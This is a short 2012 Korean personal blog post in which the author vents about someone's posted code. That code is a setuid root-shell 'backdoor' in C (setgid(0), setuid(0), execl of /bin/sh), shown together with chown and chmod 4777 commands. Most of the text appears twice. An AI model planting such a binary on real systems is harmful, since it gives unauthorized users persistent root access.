작업공간/기본적인 삽질 & 기록
setuid(0) 설정.
Sun2Day
2012. 3. 15. 16:04
반응형
어떤 X친놈이..
소스코드를 올렸다.
컴파일을 한 이후..
소유권자를.. 없는 계정인.. 500:users 로 설정했다.. -_-;;
그 다음 예상한대로 setuid 설정을 한다.
그대로 따라해봤다............
.
.
.
.
.
........
!%@!($&!@(*$!@)
안되자나............ 응?? 안되자나.................. 응???
도대체 넌 무슨 목적으로 없는 사용자인 500과 users라는 사용자 이름으로 권한을 준거니...?
니가 재정신이였으면.. root:root 로 설정했어야지.. 무슨 생각이니..???
대답 좀 해주렴.. 형이 궁금해서 그래...................
내가 모르는게 있는거니..?;;
아오.. 스트뤠쓰~~~
소스코드를 올렸다.
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(void){
setgid(0); setuid(0);
execl("/bin/sh","sh",0);
}
#include <stdlib.h>
#include <unistd.h>
int main(void){
setgid(0); setuid(0);
execl("/bin/sh","sh",0);
}
컴파일을 한 이후..
소유권자를.. 없는 계정인.. 500:users 로 설정했다.. -_-;;
chown 500:users backdoor
그 다음 예상한대로 setuid 설정을 한다.
chmod 4777 backdoor
그대로 따라해봤다............
.
.
.
.
.
........
!%@!($&!@(*$!@)
안되자나............ 응?? 안되자나.................. 응???
도대체 넌 무슨 목적으로 없는 사용자인 500과 users라는 사용자 이름으로 권한을 준거니...?
니가 재정신이였으면.. root:root 로 설정했어야지.. 무슨 생각이니..???
대답 좀 해주렴.. 형이 궁금해서 그래...................
내가 모르는게 있는거니..?;;
아오.. 스트뤠쓰~~~
반응형